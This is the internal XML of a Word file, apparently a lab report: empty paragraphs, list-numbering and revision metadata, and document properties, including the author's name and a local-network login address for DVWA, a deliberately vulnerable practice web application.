    <w:p w14:paraId="7C74E548" w14:textId="77777777" w:rsidR="00D7499C" w:rsidRDefault="00D7499C"/>
    <w:p w14:paraId="431D0ED8" w14:textId="4CCF4DEF" w:rsidR="003C3810" w:rsidRDefault="003C3810"/>
    <w:p w14:paraId="47ED9F04" w14:textId="77777777" w:rsidR="003C3810" w:rsidRDefault="003C3810"/>
    <w:sectPr w:rsidR="003C38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D7C3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABE641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F2298"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="399691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859FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ABE641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10"/>
    <w:rsid w:val="0005611C"/>
    <w:rsid w:val="00134213"/>
    <w:rsid w:val="00245353"/>
    <w:rsid w:val="00254D43"/>
    <w:rsid w:val="002772CD"/>
    <w:rsid w:val="002C0665"/>
    <w:rsid w:val="002F7C9E"/>
    <w:rsid w:val="003C3810"/>
    <w:rsid w:val="00561081"/>
    <w:rsid w:val="00730BAB"/>
    <w:rsid w:val="007D4054"/>
    <w:rsid w:val="009A3F9C"/>
    <w:rsid w:val="00A13F4C"/>
    <w:rsid w:val="00D16EAC"/>
    <w:rsid w:val="00D37B68"/>
    <w:rsid w:val="00D7499C"/>
    <w:rsid w:val="00E1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883FB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A77B4C88-7CB8-4E10-888D-2D9A25ECC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6108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08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74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192.168.0.106/dvwa/login.php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13</Pages>
  <Words>340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Carvalho</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sergio Carvalho</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-23T14:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-24T04:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>